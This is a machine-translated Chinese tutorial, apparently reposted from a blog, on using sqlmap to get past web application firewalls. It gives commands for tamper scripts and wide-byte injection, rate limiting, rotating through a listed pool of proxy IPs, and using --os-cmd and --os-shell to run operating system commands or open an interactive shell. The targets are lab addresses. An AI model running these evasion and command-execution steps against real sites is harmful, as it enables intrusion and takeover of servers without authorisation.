当前位置:网站首页>Sqlmap tutorial (IV) practical skills three: bypass the firewall

Sqlmap tutorial (IV) practical skills three: bypass the firewall

2022-07-07 07:15:00 A τθ

 At present, many websites use waf Protect the website , During the penetration test , Many operations will be blocked , In the test SQL When the injection ,waf It will intercept the requested traffic ,
 Lead to SQLMAP The requested content cannot reach the destination ,SQLMAP It is impossible to judge whether the target has injection ,waf Intercept malicious attack requests , Interception will be blacklisted , Cause attackers 
 Unable to access the target . Unable to perform security detection .

One 、 see temper modular

sqlmap --list-tamper

 Insert picture description here

Two 、 Wide byte Injection

sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user

 Insert picture description here
 Insert picture description here  Insert picture description here

3、 ... and 、 Set the thread size

 In case of waf When , If the concurrency is too large , Think of it as cc attack ,ip Will be blocked .

--threads=1  Set the thread to 1

Four 、 Set up http Request delay

--delay=DELAY  Set each  HTTP Requested delay seconds .

5、 ... and 、 Use proxy injection

sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1  --proxy=http://192.168.1.107:4455

 Insert picture description here
 Insert picture description here
 Insert picture description here

6、 ... and 、 Use proxy pool injection

 After purchasing the agent pool , Get the proxy and save it to a file , such as :proxy.txt

123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730
--proxy-file  Load the agent list from the file .
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt

7、 ... and 、sqlmap Command execution

--os-cmd=OSCMD       Execute operating system commands 
--os-shell           Call up the interactive operating system  shell
 The current user of the injection point is dba when , Use the above two commands , One is to execute commands , One is to call the interactive operating system shell

1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"

2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
 Use --os-shell The command will pop up an interaction shell The interface of , You can enter commands , If it can echo, it will return the information of command execution .
原网站

版权声明
本文为[A τθ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207070321502374.html